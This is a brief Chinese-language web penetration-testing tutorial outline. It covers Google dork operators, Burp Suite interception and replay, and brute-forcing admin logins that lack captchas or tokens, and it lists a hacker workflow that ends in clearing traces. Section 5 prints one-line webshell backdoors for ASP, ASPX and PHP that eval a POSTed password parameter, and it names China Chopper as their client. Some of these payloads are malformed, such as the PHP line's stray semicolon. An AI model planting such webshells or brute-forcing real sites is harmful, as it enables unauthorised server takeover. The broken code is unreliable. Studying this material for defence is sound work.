- 目錄
- 1. 前言
- 2. 常見web安全漏洞
- 3. 思路
- 3.1滲透測試思路
- 3.2黑客攻擊思路
- 4. 暴力破解
- 4.1谷歌黑語法
- 4.1.1 黑語法inurl:搜索url包含指定字符串
- 4.1.2 黑語法intitle:搜索網頁中的標題名是否包含指定字符串
- 4.1.3 黑語法intext:搜索網頁正文內容是否包含指定字符串
- 4.2Burpsuite常用功能
- 4.2.1 攔截
- 4.2.2抓包
- 4.2.3改包
- 4.2.4重放
- 4.3後臺暴力破解
- 5. 上傳木馬或漏洞
- 5.1一句話木馬
- 5.2上傳漏洞
1.前言
滲透測試時通過模擬惡意黑客的攻擊方法,來評估計算機網絡系統安全的一種評估方法。
2.常見web安全漏洞
3.思路
3.1滲透測試思路
信息收集->攻擊測試
3.2黑客攻擊思路
信息收集->攻擊測試->提升權限->擴大成果->清除痕跡
4.暴力破解
4.1谷歌黑語法
4.1.1黑語法inurl:搜索url包含指定字符串
4.1.2黑語法intitle:搜索網頁中的標題名是否包含指定字符串
4.1.3黑語法intext:搜索網頁正文內容是否包含指定字符串
4.2Burpsuite常用功能
Burpsuite是Java開發的工具,所以需要安裝好JDK,版本最好1.8以上
使用流程:
攔截->抓包->改包->重放
4.2.1 攔截
點擊options配置代理服務器
瀏覽器也要配置,這裏使用火狐瀏覽器,安裝插件proxy或者谷歌hackbar
4.2.2抓包
配置好,刷新瀏覽器就能截取到數據包
但此時並沒有達到攔截效果,需要開啓Intercept,改爲ON
4.2.3改包
刷新瀏覽器就能截取到數據包,並攔截
4.2.4重放
重放數據包
4.3後臺暴力破解
對登陸數據包不存在的驗證碼、token等一次性驗證進行破解。
5.上傳木馬或漏洞
5.1一句話木馬
- asp:<%eval request(“pass”)%>
- aspx:<%@Page Language%><?eval(Request.Item[“pass”].” unsafe”);%>
- php:<?php @eval($_POST[‘pass’];);?>
5.2上傳漏洞
軟件:中國菜刀,配合木馬使用